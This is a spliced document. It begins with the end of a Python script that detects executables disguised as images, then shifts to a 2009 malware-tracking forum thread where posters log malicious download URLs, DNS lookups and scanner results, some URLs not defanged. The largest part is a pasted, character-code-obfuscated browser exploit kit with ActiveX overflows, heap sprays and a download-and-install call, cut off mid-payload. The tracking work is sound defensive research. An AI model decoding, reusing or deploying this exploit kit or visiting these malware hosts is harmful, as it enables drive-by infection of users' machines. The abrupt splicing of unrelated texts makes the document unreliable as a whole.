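    ("png", b"\x89PNG\r\n\x1a\n"),
    ("gif", b"GIF87a"),
    ("gif", b"GIF89a"),
]
EXPECTED = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}
PE_MACHINES = {0x014C: "i386", 0x8664: "x86-64"}  # COFF Machine values


def pe_machine(data):
    """Return the COFF machine value if data begins a PE file, else None.

    'MZ' alone only marks a DOS stub; a PE file also carries the offset of
    the 'PE\\0\\0' signature in the 32-bit field at 0x3C (e_lfanew).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < e_lfanew + 6:
        return None
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return machine


def detect(data):
    """Classify content by its bytes only."""
    machine = pe_machine(data)
    if machine is not None:
        return "pe-" + PE_MACHINES.get(machine, "0x%04x" % machine)
    for kind, magic in SIGNATURES:
        if data.startswith(magic):
            return kind
    return "unknown"


def check_download(filename, data):
    """Compare what the extension claims with what the content is."""
    ext = os.path.splitext(filename)[1].lower()
    expected = EXPECTED.get(ext)
    actual = detect(data)
    return {
        "file": filename,
        "claimed": expected,
        "actual": actual,
        "mismatch": expected is not None and actual != expected,
    }


def constructed_pe(machine=0x014C):
    """Constructed sample: the smallest header that passes pe_machine()."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew points just past the stub
    return bytes(dos) + b"PE\0\0" + struct.pack("<H", machine) + bytes(18)


# Constructed sample: the first bytes of an ordinary JFIF image.
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"

if __name__ == "__main__":
    for name, blob in [("prop5.jpg", constructed_pe()),
                       ("wrm.png", constructed_pe()),
                       ("photo.jpg", JPEG_HEAD)]:
        print(check_download(name, blob))
```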




Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 08:24:24 pm
Code: [Select]
hxxp://securedvirusscanner.com/download/Install_2006-60.exe

$ dig securedvirusscanner.com +short
212.117.165.126
78.47.172.66
94.76.213.227

http://www.virustotal.com/analisis/1f91b6bb3043cacdfbe112726a034773 0/21

http://www.malwaredomainlist.com/mdl.php?search=212.117.165&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=78.47.172.&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=94.76.213&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 08:26:21 pm
Code: [Select]
hxxp://mixante.cn/in.cgi?income55

$ dig mixante.cn +short
94.247.3.150

http://anubis.iseclab.org/?action=result&task_id=1871940bf2bae17c489b6fd571484c3b0&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 08:46:44 pm
Code: [Select]
http://dasretokfin.com/index.php

$ dig dasretokfin.com +short
95.129.144.228

malicious js
http://wepawet.iseclab.org/view.php?hash=ad13e2d0b2aa517342cdf4b1dd897377&t=1238387964&type=js

malicious pdf
http://wepawet.iseclab.org/view.php?hash=2b0e81286d6fd2ad76f3ce55bc0b7b0b&t=1239655549&type=js
http://anubis.iseclab.org/?action=result&task_id=1158fe86293a81934bd467e2ccbd668cb&format=html

http://www.malwaredomainlist.com/mdl.php?search=95.129.144.&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 10:19:47 pm
Code: [Select]
hxxp://codecvistaz.com/codec/185.exe

$ dig codecvistaz.com +short
194.165.4.77

http://www.virustotal.com/analisis/0c902ffb816c7ca158f8c4e709fceb21

domain already known
nasty network
http://www.malwaredomainlist.com/mdl.php?search=194.165.4&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: CkreM on April 14, 2009, 12:17:54 am
Code: [Select]
http://dasretokfin.com/index.php

$ dig dasretokfin.com +short
95.129.144.228

malicious js
http://wepawet.iseclab.org/view.php?hash=ad13e2d0b2aa517342cdf4b1dd897377&t=1238387964&type=js

malicious pdf
http://wepawet.iseclab.org/view.php?hash=2b0e81286d6fd2ad76f3ce55bc0b7b0b&t=1239655549&type=js
http://anubis.iseclab.org/?action=result&task_id=1158fe86293a81934bd467e2ccbd668cb&format=html

http://www.malwaredomainlist.com/mdl.php?search=95.129.144.&colsearch=All&quantity=50


leads to zbot now
roasocks.com/ldr.exe
roasocks.com/cfg.bin
roasocks.com/cfg2.bin
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 14, 2009, 01:03:43 pm
Code: [Select]
hxxp://biao.jijiyy1144.cn/liebiao/biao.txt

$ cat biao.txt | sort | uniq

Code: [Select]
$ dig biao.jijiyy1144.cn +short
121.14.142.71

$ dig xxx.elcakorea.co.kr +short
208.67.217.132

http://www.bfk.de/bfk_dnslogger.html?query=121.14.142.71#result
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 14, 2009, 05:08:25 pm
Code: [Select]
hxxp://193.33.61.224/css/pdf.php?new=3&u=i_7_0&cc=US&st=3uqd&tm=000013&r=r29s9gkdn

Referrer: hxxp://x-playing.com/?advrtsid=adid0130

$ dig x-playing.com +short
193.33.61.243

http://wepawet.iseclab.org/view.php?hash=6888b96e1202a27a93e4291114f3db79&type=js
http://www.virustotal.com/analisis/78cf30b945da7437178773bb022333f6 3/36

http://www.malwaredomainlist.com/mdl.php?search=193.33.61&colsearch=All&quantity=50


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 14, 2009, 05:34:47 pm
Code: [Select]
hxxp://xtrarobotz.com/liloadercdi.php?id=409179&spl=3

file = llllload.exe

http://anubis.iseclab.org/?action=result&task_id=13c06f060a35ab9b4c10cadb617927f75&format=html

http://www.virustotal.com/analisis/e2384c16012721191fbf4a804803c571 22/40

http://www.bfk.de/bfk_dnslogger.html?query=xtrarobotz.com#result

Well well, will ya look at this!


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 15, 2009, 11:41:36 am
Code: [Select]
hxxp://l.uye123.com/list.txt

$ dig l.uye123.com +short
121.12.116.4
$ dig u7.hux7.com +short
121.12.116.82

http://www.malwaredomainlist.com/mdl.php?search=121.12.116&colsearch=All&quantity=50 (43 reports)

Code: [Select]
$ cat list.txt
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 15, 2009, 11:47:30 am
Code: [Select]
hxxp://3.meng3130.cn/cs/ok.exe

$ dig 3.meng3130.cn +short
125.91.13.224

http://www.virustotal.com/analisis/69400d3e7355aae911b8c81a86324b47 22/39


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 05:56:26 pm
Code: [Select]
hxxp://files.ms-load-top-files.com/exe/setup_200093_1_1.exe

$ dig files.ms-load-top-files.com +short
ms-load-top-files.com.
195.88.81.74

$ dig ms-load-top-files.com +short
195.88.81.74

http://www.virustotal.com/analisis/f70d4a01f071f840873dd407e4597703 12/40

http://www.malwaredomainlist.com/mdl.php?search=195.88.81&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 06:29:08 pm
http://anubis.iseclab.org/?action=result&task_id=18767fadc009bb0b455562fcb8d18de54&format=html

Code: [Select]
hxxp://int.proreportms1.com/stat.php?func=installrun&id=200093&landing=-1&lang=EN&sub=1

$ dig int.proreportms1.com +short
proreportms1.com.
195.88.80.207

$ dig proreportms1.com +short
195.88.80.207

http://www.malwaredomainlist.com/mdl.php?search=195.88.80&colsearch=All&quantity=50


Code: [Select]
hxxp://dl.top-scan-ms-storage.com/get/?pin=0&lnd=0&type=main
hxxp://dl.top-scan-ms-storage.com/get/?pin=200093&lnd=-1&type=main
hxxp://dl.top-scan-ms-storage.com/get/?pin=200093&lnd=-1&type=main

$ dig dl.top-scan-ms-storage.com +short
top-scan-ms-storage.com.
195.88.81.116

$ dig top-scan-ms-storage.com +short
195.88.81.116

http://www.malwaredomainlist.com/mdl.php?search=195.88.81&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 06:39:16 pm
Code: [Select]
hxxp://msscanner-top-pc.com/200093/scan

$ dig msscanner-top-pc.com +short
195.88.81.93

http://wepawet.iseclab.org/view.php?hash=708029721cdb29d9fc6930054d427851&t=1239907315&type=js

http://www.malwaredomainlist.com/mdl.php?search=195.88.81&colsearch=All&quantity=50

http://www.bfk.de/bfk_dnslogger.html?query=195.88.81.93#result
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 07:00:42 pm
Quote
http://www.bfk.de/bfk_dnslogger.html?query=xtrarobotz.com#result
Well well, will ya look at this!

What the heck is this one again... anyway, found a couple more stuff from its current IPs, merely via googling:
http://www.bfk.de/bfk_dnslogger.html?query=peskostruikaz.com#result

Code: [Select]
hxxp://peskostruikaz.com/?click=4297D
hxxp://peskostruikaz.com/?click=5364991
hxxp://peskostruikaz.com/p1d2f3.php?id=464555
hxxp://peskostruikaz.com/?click=C4DB82
hxxp://peskostruikaz.com/?click=10813A4
hxxp://peskostruikaz.com/?click=1EEFF7B
hxxp://openstats.info/counter3.swf

Pdf results...
http://www.virustotal.com/analisis/d7edb9e0ef21f6ac3d1bb91a0eccbc10
Swf results...
http://www.virustotal.com/analisis/2a2ff89c63bfab7b2a3358108ec7237a
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 07:23:22 pm
Code: [Select]
32#115#102#114#111#109#32#61#32#117#114#108#43#34#38#111#112#114#61#49#34#59#13#10#118#97#114#32#102#117#99#107#97#118#111#61#34#83#66#34#59#13#10#118#97#114#32#120#59#13#10#118#97#114#32#102#117#99#107#97#118#112#61#34#83#66#34#59#13#10#118#97#114#32#111#98#106#59#13#10#118#97#114#32#102#117#99#107#97#118#120#61#34#83#66#34#59#13#10#118#97#114#32#109#121#99#97#114#115#32#61#32#110#101#119#32#65#114#114#97#121#40#41#59#13#10#118#97#114#32#102#117#99#107#97#118#97#61#34#83#66#34#59#13#10#109#121#99#97#114#115#91#48#93#32#61#32#34#99#58#47#80#114#111#103#114#97#109#32#70#105#108#101#115#47#79#117#116#108#111#111#107#32#69#120#112#114#101#115#115#47#87#65#66#46#69#88#69#34#59#13#10#109#121#99#97#114#115#91#49#93#32#61#32#34#100#58#47#80#114#111#103#114#97#109#32#70#105#108#101#115#47#79#117#116#108#111#111#107#32#69#120#112#114#101#115#115#47#87#65#66#46#69#88#69#34#59#13#10#109#121#99#97#114#115#91#50#93#32#61#32#34#101#58#47#80#114#111#103#114#97#109#32#70#105#108#101#115#47#79#117#116#108#111#111#107#32#69#120#112#114#101#115#115#47#87#65#66#46#69#88#69#34#59#13#10#118#97#114#32#111#98#106#108#99#120#32#61#32#99#111#98#106#40#34#115#110#112#118#119#46#83#110#97#112#115#104#111#116#32#86#105#101#119#101#114#32#67#111#110#116#114#111#108#46#49#34#41#59#13#10#105#102#40#111#98#106#108#99#120#41#32#123#13#10#115#101#116#84#105#109#101#111#117#116#40#39#119#105#110#100#111#119#46#108#111#99#97#116#105#111#110#32#61#32#34#108#100#97#112#58#47#47#34#39#44#32#51#48#48#48#41#59#13#10#102#111#114#32#40#120#32#105#110#32#109#121#99#97#114#115#41#123#13#10#111#98#106#32#61#32#99#111#98#106#40#34#115#110#112#118#119#46#83#110#97#112#115#104#111#116#32#86#105#101#119#101#114#32#67#111#110#116#114#111#108#46#49#34#41#13#10#118#97#114#32#98#117#102#49#32#61#32#115#102#114#111#109#59#13#10#118#97#114#32#102#117#99#107#97#118#103#61#34#83#66#34#59#13#10#118#97#114#32#98#117#102#50#61#109#121#99#97#114#115#91#120#93#59#13#10#118#97#114#32#102#117#99#107#97#118#106#61#34#83#66#34#59#13
#10#111#98#106#46#90#111#111#109#32#61#32#48#59#13#10#111#98#106#46#83#104#111#119#78#97#118#105#103#97#116#105#111#110#66#117#116#116#111#110#115#32#61#32#102#97#108#115#101#59#13#10#111#98#106#46#65#108#108#111#119#67#111#110#116#101#120#116#77#101#110#117#32#61#32#102#97#108#115#101#59#13#10#111#98#106#46#83#110#97#112#115#104#111#116#80#97#116#104#32#61#32#98#117#102#49#59#13#10#116#114#121#32#123#13#10#111#98#106#46#67#111#109#112#114#101#115#115#101#100#80#97#116#104#32#61#32#98#117#102#50#59#13#10#111#98#106#46#80#114#105#110#116#83#110#97#112#115#104#111#116#40#41#59#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#125#13#10#125#13#10#118#97#114#32#102#117#99#107#97#118#113#103#103#97#61#34#83#66#34#59#13#10#118#97#114#32#102#117#99#107#97#118#113#103#103#120#97#61#34#83#66#100#34#59#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#100#108#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#68#111#119#110#108#111#97#100#101#114#46#68#76#111#97#100#101#114#46#49#34#41#59#13#10#105#102#32#40#111#98#106#41#123#13#10#111#98#106#46#68#111#119#110#108#111#97#100#65#110#100#73#110#115#116#97#108#108#40#117#114#108#41#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#119#107#115#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#48#48#69#49#68#66#53#57#45#54#69#70#68#45#52#67#69#55#45#56#67#48#65#45#50#68#65#51#66#67#65#65#68#57#67#54#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#110#117#109#32#61#32#50#48#50#49#49#54#49#48#56#59#13#10#111#98#106#46#87#107#115#80#105#99#116#117#114#101#73#110#116#101#114#102#97#99#101#32#61#32#110#117#109#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#
10#125#13#10#102#117#110#99#116#105#111#110#32#111#103#97#109#101#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#70#57#49#55#53#51#52#68#45#53#51#53#66#45#52#49#54#66#45#56#69#56#70#45#48#67#48#52#55#53#54#67#51#49#65#56#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#34#34#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#54#48#48#41#32#98#117#102#32#43#61#32#34#92#120#48#99#92#120#48#99#92#120#48#99#92#120#48#99#34#59#13#10#111#98#106#46#73#69#83#116#97#114#116#78#97#116#105#118#101#40#98#117#102#41#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#99#97#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#66#70#54#69#70#70#70#51#45#52#53#53#56#45#52#67#52#67#45#65#68#65#70#45#65#56#55#56#57#49#67#53#70#51#65#51#125#34#41#59#13#10#105#102#32#40#111#98#106#46#65#100#100#67#111#108#117#109#110#41#32#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#40#98#117#102#46#108#101#110#103#116#104#32#60#32#49#50#56#41#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#32#49#50#56#41#59#13#10#111#98#106#46#65#100#100#67#111#108#117#109#110#40#98#117#102#44#49#41#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#98#117#100#100#121#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#83#98#46#83#117#112#101#114#66#117#100#100#121#34#41#59#13#10#105#102#32#40#111#98#106#41#32#123#13#10#109#115#40
#41#59#13#10#111#98#106#46#76#105#110#107#83#66#73#99#111#110#115#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#103#111#109#119#101#98#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#71#111#109#87#101#98#67#116#114#108#46#71#111#109#77#97#110#97#103#101#114#46#49#34#41#59#13#10#105#102#32#40#111#98#106#41#32#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#61#34#65#65#65#65#34#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#53#48#54#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#53#48#54#41#59#13#10#98#117#102#32#43#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#111#98#106#46#79#112#101#110#85#82#76#40#98#117#102#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#120#109#108#99#111#114#101#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#120#109#108#32#61#32#110#117#108#108#59#13#10#118#97#114#32#120#109#108#32#61#32#99#111#98#106#40#34#77#115#120#109#108#50#46#88#77#76#72#84#84#80#46#54#46#48#34#41#59#13#10#105#102#32#40#120#109#108#41#123#13#10#120#109#108#32#61#32#99#111#98#106#40#34#77#115#120#109#108#50#46#88#77#76#72#84#84#80#46#52#46#48#34#41#59#13#10#125#13#10#105#102#40#33#120#109#108#41#114#101#116#117#114#110#32#48#59#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#123#56#56#100#57#54#57#99#53#45#102#49#57#50#45#49#49#100#52#45#97#54#53#102#45#48#48#52#48#57#54#51#50#53#49#101#53#125#34#41#59#13#10#111#98#106#32#61#32#111#98#106#46#111#98#106#101#99#116#13#10#105#102#40#111#98#106#41#32#123#13#10#109#115#40#41#59#13#10#116#114#121#32#12
3#111#98#106#46#111#112#101#110#40#110#101#119#32#65#114#114#97#121#40#41#44#110#101#119#32#65#114#114#97#121#40#41#44#110#101#119#32#65#114#114#97#121#40#41#44#110#101#119#32#65#114#114#97#121#40#41#44#110#101#119#32#65#114#114#97#121#40#41#41#59#125#32#99#97#116#99#104#40#101#41#32#123#125#59#13#10#111#98#106#46#111#112#101#110#40#110#101#119#32#79#98#106#101#99#116#40#41#44#110#101#119#32#79#98#106#101#99#116#40#41#44#110#101#119#32#79#98#106#101#99#116#40#41#44#110#101#119#32#79#98#106#101#99#116#40#41#44#110#101#119#32#79#98#106#101#99#116#40#41#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#34#46#46#46#34#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#5
4#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#113#117#105#99#107#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#81#117#105#99#107#84#105#109#101#46#81#117#105#99#107
#84#105#109#101#46#52#34#41#59#13#10#105#102#32#40#111#98#106#41#32#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#34#34#59#13#10#102#111#114#40#118#97#114#32#105#61#48#59#105#60#50#48#48#59#105#43#43#41#32#123#13#10#98#117#102#32#43#61#32#34#65#65#65#65#34#59#13#10#125#13#10#98#117#102#32#43#61#32#34#65#65#65#34#59#13#10#102#111#114#40#118#97#114#32#105#61#48#59#105#60#51#59#105#43#43#41#98#117#102#32#43#61#32#34#92#120#48#99#92#120#48#99#92#120#48#99#92#120#48#99#34#59#13#10#118#97#114#32#109#121#95#100#105#118#32#61#32#100#111#99#117#109#101#110#116#46#99#114#101#97#116#101#69#108#101#109#101#110#116#40#34#100#105#118#34#41#59#13#10#109#121#95#100#105#118#46#105#110#110#101#114#72#84#77#76#32#61#32#13#10#34#60#111#98#106#101#99#116#32#99#108#97#115#115#105#100#61#92#34#99#108#115#105#100#58#48#50#66#70#50#53#68#53#45#56#67#49#55#45#52#66#50#51#45#66#67#56#48#45#68#51#52#56#56#65#66#68#68#67#54#66#92#34#32#119#105#100#116#104#61#92#34#50#48#48#92#34#32#104#101#105#103#104#116#61#92#34#50#48#48#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#115#114#99#92#34#32#118#97#108#117#101#61#92#34#111#98#106#101#99#116#95#114#116#115#112#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#116#121#112#101#92#34#32#118#97#108#117#101#61#92#34#105#109#97#103#101#47#120#45#113#117#105#99#107#116#105#109#101#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#97#117#116#111#112#108#97#121#92#34#32#118#97#108#117#101#61#92#34#116#114#117#101#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#113#116#110#101#120#116#49#92#34#32#118#97#108#117#101#61#92#34#60#114#116#115#112#58#47#47#66#66#66#66#58#34#43#98#117#102#43#34#62#84#60#109#121#115#101#108#102#62#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#116#97#114#103#101#116#92#34#32#118#97#108#117#101#61#92#34#109#121#115#101#108#102#92#34#62#34#32#43#13#10#34#60#47#111#98#106#101#99#116#
62#34#59#13#10#100#111#99#117#109#101#110#116#46#98#111#100#121#46#97#112#112#101#110#100#67#104#105#108#100#40#109#121#95#100#105#118#41#59#13#10#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#32#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#114#101#97#108#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#73#69#82#80#67#116#108#46#73#69#82#80#67#116#108#46#49#34#41#59#13#10#105#102#32#40#111#98#106#41#32#123#13#10#105#102#40#111#98#106#46#80#108#97#121#101#114#80#114#111#112#101#114#116#121#40#34#80#82#79#68#85#67#84#86#69#82#83#73#79#78#34#41#62#34#54#46#48#46#49#52#46#53#53#50#34#41#32#123#13#10#111#98#106#32#61#32#99#111#98#106#40#34#123#50#70#53#52#50#65#50#69#45#69#68#67#57#45#52#66#70#55#45#56#67#66#49#45#56#55#67#57#57#49#57#70#55#70#57#51#125#34#41#59#13#10#109#115#40#41#59#13#10#118#97#114#32#109#32#61#32#34#34#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#51#50#41#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#51#50#41#59#13#10#109#32#61#32#111#98#106#46#67#111#110#115#111#108#101#59#13#10#111#98#106#46#67#111#110#115#111#108#101#32#61#32#98#117#102#59#13#10#111#98#106#46#67#111#110#115#111#108#101#32#61#32#109#59#13#10#109#32#61#32#111#98#106#46#67#111#110#115#111#108#101#59#13#10#111#98#106#46#67#111#110#115#111#108#101#32#61#32#98#117#102#59#13#10#111#98#106#46#67#111#110#115#111#108#101#32#61#32#109#59#13#10#125#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#110#116#97#117#100#105#111#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#55#55
#56#50#57#70#49#52#45#68#57#49#49#45#52#48#70#70#45#65#50#70#48#45#68#49#49#68#66#56#68#54#68#48#66#67#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#53#50#48#48#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#53#50#48#48#41#59#13#10#111#98#106#46#83#101#116#70#111#114#109#97#116#76#105#107#101#83#97#109#112#108#101#40#98#117#102#41#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#99#114#101#97#116#105#118#101#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#48#65#53#70#68#55#67#53#45#65#52#53#67#45#52#57#70#67#45#65#68#66#53#45#57#57#53#50#53#52#55#68#53#55#49#53#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#53#49#50#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#53#49#50#41#59#13#10#111#98#106#46#99#97#99#104#101#102#111#108#100#101#114#32#61#32#98#117#102#59#13#10#125#13#10#125#99#97#